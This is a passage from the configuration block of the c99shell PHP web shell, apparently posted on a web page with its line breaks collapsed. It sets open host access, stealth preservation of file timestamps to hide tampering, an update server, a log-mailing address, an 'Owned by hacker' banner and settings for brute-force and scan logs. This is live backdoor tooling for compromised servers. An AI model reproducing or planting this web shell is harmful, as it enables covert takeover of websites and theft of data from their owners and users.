turn off auth.$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOSTe.g. array("192.168.0.*","127.0.0.1")$login_txt = "Restricted area"; //http-auth message.$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shellv.".$shver."</a>: access denied";$gzipencode = true; //Encode with gzip?$autoupdate = false; //Automatic updating?$updatenow = false; //If true, update now (this variable will be false)$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server$filestealth = true; //if true, don't change modify&access-time$donated_html = "<center><b>Owned by hacker</b></center>";/* If you publish free shell and you wishadd link to your site or any other information,put here your html. */$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array,display $donated_html.$curdir = "./"; //start folder//$curdir = getenv("DOCUMENT_ROOT");$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or%WINDIR/temp)$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)$log_email = "rooo7_111@hotmail.com"; //Default e-mail for sending logs$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or"d"escending$sort_save = true; //If true then save sorting-type.// Registered file-types.// array(// "{action1}"=>array("ext1","ext2","ext3",...),// "{action2}"=>array("ext4","ext5","ext6",...),// ...// )$ftypes = array("html"=>array("html","htm","shtml"),"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),"exe"=>array("sh","install","bat","cmd"),"ini"=>array("ini","inf"),"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),"img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),"sdb"=>array("sdb"),"phpsess"=>array("sess"),"download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar"));
Add a Comment